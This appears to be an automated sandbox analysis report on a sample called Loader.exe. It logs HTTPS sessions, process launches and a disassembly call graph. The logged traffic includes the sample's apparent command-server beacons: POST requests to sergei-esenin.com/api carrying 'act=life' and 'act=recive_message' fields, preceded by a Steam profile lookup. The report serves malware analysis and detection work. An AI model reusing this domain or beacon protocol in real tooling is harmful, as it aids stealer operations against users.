                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=c5d7orcj2qj0t2prf3si89tgcm; expires=Wed, 05 Feb 2025 14:22:49 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bIaePxbTrYWoSDwYfXSEhmO0YFmRFntuOXY13V9YwE54sdUEB5XqvUVM02HACB6cK6BVCzuQ4m46Fh3GSNRpwr2oeLqcWUyynOH4oYVHmuNibL23s4dQ8vDul8tdcGpCKiR0SQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d19e16c59cc4257-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    2024-10-12 20:36:10 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                    Data Ascii: aerror #D12
                                                                                                                    2024-10-12 20:36:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.649744104.102.49.2544435200C:\Users\user\Desktop\Loader.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-10-12 20:36:11 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Host: steamcommunity.com
                                                                                                                    2024-10-12 20:36:12 UTC1870INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Date: Sat, 12 Oct 2024 20:36:11 GMT
                                                                                                                    Content-Length: 34837
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: sessionid=bba236ef271ebe3440b984ee; Path=/; Secure; SameSite=None
                                                                                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                    2024-10-12 20:36:12 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                    2024-10-12 20:36:12 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                                    Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                                    2024-10-12 20:36:12 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                    Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                                    2024-10-12 20:36:12 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.649755172.67.206.2044435200C:\Users\user\Desktop\Loader.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-10-12 20:36:12 UTC264OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 8
                                                                                                                    Host: sergei-esenin.com
                                                                                                                    2024-10-12 20:36:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                    Data Ascii: act=life
                                                                                                                    2024-10-12 20:36:12 UTC551INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 12 Oct 2024 20:36:12 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qdF03%2BedDimf763cLAvUtYcRjMbSHekTFW53933EhrJVvkEZsO%2FZv6oUwBppUxWgxMBQ8VWvrf23wjUSsvYpqFV1u6iCIWgBEHM0EWMNeujXXJm94f5bLpnxl96hw9bOgEix0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d19e17b99277d1e-EWR
                                                                                                                    2024-10-12 20:36:12 UTC818INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                    Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                    2024-10-12 20:36:12 UTC1369INData Raw: 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b
                                                                                                                    Data Ascii: cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cook
                                                                                                                    2024-10-12 20:36:12 UTC1369INData Raw: 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74
                                                                                                                    Data Ascii: ent/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input
                                                                                                                    2024-10-12 20:36:12 UTC885INData Raw: 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64
                                                                                                                    Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand
                                                                                                                    2024-10-12 20:36:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.649761172.67.206.2044435200C:\Users\user\Desktop\Loader.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-10-12 20:36:13 UTC354OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cookie: __cf_mw_byp=P9r_mXsInYaSCDFf.Rj_aAUYNGZ0HMdPID1gWzVfqGI-1728765372-0.0.1.1-/api
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 80
                                                                                                                    Host: sergei-esenin.com
                                                                                                                    2024-10-12 20:36:13 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f 31 26 6a 3d 31 30 65 38 31 65 62 62 37 38 36 39 33 33 34 63 30 66 39 66 61 30 66 33 30 39 34 30 35 62 62 33
                                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@qjwo1&j=10e81ebb7869334c0f9fa0f309405bb3
                                                                                                                    2024-10-12 20:36:13 UTC837INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 12 Oct 2024 20:36:13 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=o5e6giqtp9g285s2d82bc5g08u; expires=Wed, 05 Feb 2025 14:22:52 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hLjJqUVsgZ7GW%2B1K0pegef%2BLCJFDjwsvL1vF0wwMbPyDSwK2b%2BO%2B5HdQFZtlAjiX8soU1Dz3lLtMKkHHZCTlQ3Oq8xqZhjdcuU0bQajLVQNt4GZ%2BSp0uKO%2Fud%2F%2BMcMsvexk5xg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d19e17fccd18cbf-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    2024-10-12 20:36:13 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                    Data Ascii: aerror #D12
                                                                                                                    2024-10-12 20:36:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Click to jump to process

                                                                                                                    Click to jump to process

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Click to jump to process

                                                                                                                    Target ID:0
                                                                                                                    Start time:16:35:59
                                                                                                                    Start date:12/10/2024
                                                                                                                    Path:C:\Users\user\Desktop\Loader.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                                    Imagebase:0x190000
                                                                                                                    File size:581'008 bytes
                                                                                                                    MD5 hash:CB50ACC9B951B52306B95EAF8D4E2048
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:16:36:00
                                                                                                                    Start date:12/10/2024
                                                                                                                    Path:C:\Users\user\Desktop\Loader.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                                    Imagebase:0x190000
                                                                                                                    File size:581'008 bytes
                                                                                                                    MD5 hash:CB50ACC9B951B52306B95EAF8D4E2048
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:3
                                                                                                                    Start time:16:36:00
                                                                                                                    Start date:12/10/2024
                                                                                                                    Path:C:\Users\user\Desktop\Loader.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                                    Imagebase:0x190000
                                                                                                                    File size:581'008 bytes
                                                                                                                    MD5 hash:CB50ACC9B951B52306B95EAF8D4E2048
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:6
                                                                                                                    Start time:16:36:01
                                                                                                                    Start date:12/10/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 284
                                                                                                                    Imagebase:0x760000
                                                                                                                    File size:483'680 bytes
                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:8
                                                                                                                    Start time:16:36:12
                                                                                                                    Start date:12/10/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1884
                                                                                                                    Imagebase:0x760000
                                                                                                                    File size:483'680 bytes
                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:10
                                                                                                                    Start time:16:36:14
                                                                                                                    Start date:12/10/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 1904
                                                                                                                    Imagebase:0x760000
                                                                                                                    File size:483'680 bytes
                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:0.6%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:10.2%
                                                                                                                      Total number of Nodes:254
                                                                                                                      Total number of Limit Nodes:5
                                                                                                                      execution_graph 38686 19699e 38687 1969aa ___scrt_is_nonwritable_in_current_image 38686->38687 38712 196b9a 38687->38712 38689 1969b1 38690 196b04 38689->38690 38701 1969db ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler ___scrt_release_startup_lock 38689->38701 38753 197508 4 API calls 2 library calls 38690->38753 38692 196b0b 38754 1a0e96 23 API calls __InternalCxxFrameHandler 38692->38754 38694 196b11 38755 1a0e5a 23 API calls __InternalCxxFrameHandler 38694->38755 38696 196b19 38697 1969fa 38698 196a7b 38720 19761d 38698->38720 38700 196a81 38724 192198 38700->38724 38701->38697 38701->38698 38749 1a0e70 43 API calls 4 library calls 38701->38749 38704 196a96 38750 197653 GetModuleHandleW 38704->38750 38706 196a9d 38706->38692 38707 196aa1 38706->38707 38708 196aaa 38707->38708 38751 1a0e4b 23 API calls __InternalCxxFrameHandler 38707->38751 38752 196d0b 79 API calls ___scrt_uninitialize_crt 38708->38752 38711 196ab2 38711->38697 38713 196ba3 38712->38713 38756 196e6f IsProcessorFeaturePresent 38713->38756 38715 196baf 38757 199d9e 10 API calls 2 library calls 38715->38757 38717 196bb8 38717->38689 38718 196bb4 38718->38717 38758 199dbd 7 API calls 2 library calls 38718->38758 38759 198410 38720->38759 38722 197630 GetStartupInfoW 38723 197643 38722->38723 38723->38700 38760 192348 38724->38760 38727 1921f5 _strlen 38764 1923fb 38727->38764 38729 1921da 38795 1930f8 45 API calls 3 library calls 38729->38795 38731 1921ee 38796 1929d6 75 API calls 38731->38796 38734 19221c GetPEB 38768 191cd2 38734->38768 38739 19226b 38741 191cd2 76 API calls 38739->38741 38740 1922c3 38746 1922e8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38740->38746 38797 1912ac 43 API calls _Deallocate 38740->38797 38742 192281 38741->38742 38742->38704 38745 19230c 38799 196865 38745->38799 38798 1923d5 43 API calls _Deallocate 38746->38798 38748 19231b 38748->38704 38749->38698 38750->38706 38751->38708 38752->38711 38753->38692 38754->38694 38755->38696 38756->38715 38757->38718 38758->38717 38759->38722 38761 192365 _strlen 38760->38761 38806 192a08 38761->38806 38763 1921b8 38763->38727 38794 192813 45 API calls 4 library calls 38763->38794 38765 19242e 38764->38765 38767 19240a std::ios_base::_Init 38764->38767 38815 192ae1 45 API calls 2 library calls 38765->38815 38767->38734 38769 191d02 38768->38769 38777 191da1 38769->38777 38820 193272 45 API calls 5 library calls 38769->38820 38771 191eeb 38816 192c01 38771->38816 38773 191eff 38774 196865 __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 38773->38774 38775 191f13 38774->38775 38780 1920ea 38775->38780 38777->38771 38779 192c01 _Deallocate 43 API calls 38777->38779 38821 193272 45 API calls 5 library calls 38777->38821 38822 191176 74 API calls 38777->38822 38779->38777 38781 192151 38780->38781 38784 192121 38780->38784 38783 196865 __ehhandler$?_RunAndWait@_StructuredTaskCollection@details@Concurrency@@QAG?AW4_TaskCollectionStatus@23@PAV_UnrealizedChore@23@@Z 5 API calls 38781->38783 38782 192348 std::ios_base::_Init 45 API calls 38782->38784 38785 192165 VirtualProtect 38783->38785 38784->38781 38784->38782 38787 192169 38784->38787 38824 191f1a 75 API calls ctype 38784->38824 38825 1923d5 43 API calls _Deallocate 38784->38825 38785->38739 38785->38740 38826 192568 75 API calls 5 library calls 38787->38826 38790 192173 38827 1927e1 75 API calls 38790->38827 38792 192179 38828 1923d5 43 API calls _Deallocate 38792->38828 38794->38729 38795->38731 38796->38727 38797->38746 38798->38745 38800 19686d 38799->38800 38801 19686e IsProcessorFeaturePresent 38799->38801 38800->38748 38803 19721d 38801->38803 38829 1971e0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38803->38829 38805 197300 38805->38748 38807 192a73 38806->38807 38810 192a19 std::ios_base::_Init 38806->38810 38814 1912ce 45 API calls std::_Xinvalid_argument 38807->38814 38812 192a20 std::ios_base::_Init 38810->38812 38813 1933b5 45 API calls 2 library calls 38810->38813 38812->38763 38813->38812 38815->38767 38817 192c0e 38816->38817 38818 192c1b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38816->38818 38823 1912ac 43 API calls _Deallocate 38817->38823 38818->38773 38820->38769 38821->38777 38822->38777 38823->38818 38824->38784 38825->38784 38826->38790 38827->38792 38828->38781 38829->38805 38830 1afd10 38833 1aa636 38830->38833 38834 1aa671 38833->38834 38835 1aa63f 38833->38835 38839 1a5200 38835->38839 38840 1a520b 38839->38840 38844 1a5211 38839->38844 38890 1a378f 6 API calls std::_Locinfo::_Locinfo_ctor 38840->38890 38843 1a522b 38845 1a522f 38843->38845 38846 1a5217 38843->38846 38844->38846 38891 1a37ce 6 API calls std::_Locinfo::_Locinfo_ctor 38844->38891 38892 1a32c2 14 API calls 3 library calls 38845->38892 38849 1a521c 38846->38849 38899 19fa2c 43 API calls __InternalCxxFrameHandler 38846->38899 38867 1aa441 38849->38867 38850 1a523b 38852 1a5258 38850->38852 38853 1a5243 38850->38853 38895 1a37ce 6 API calls std::_Locinfo::_Locinfo_ctor 38852->38895 38893 1a37ce 6 API calls std::_Locinfo::_Locinfo_ctor 38853->38893 38856 1a524f 38894 1a331f 14 API calls __dosmaperr 38856->38894 38857 1a5264 38858 1a5268 38857->38858 38859 1a5277 38857->38859 38896 1a37ce 6 API calls std::_Locinfo::_Locinfo_ctor 38858->38896 38897 1a4f73 14 API calls __Getctype 38859->38897 38863 1a5282 38898 1a331f 14 API calls __dosmaperr 38863->38898 38864 1a5255 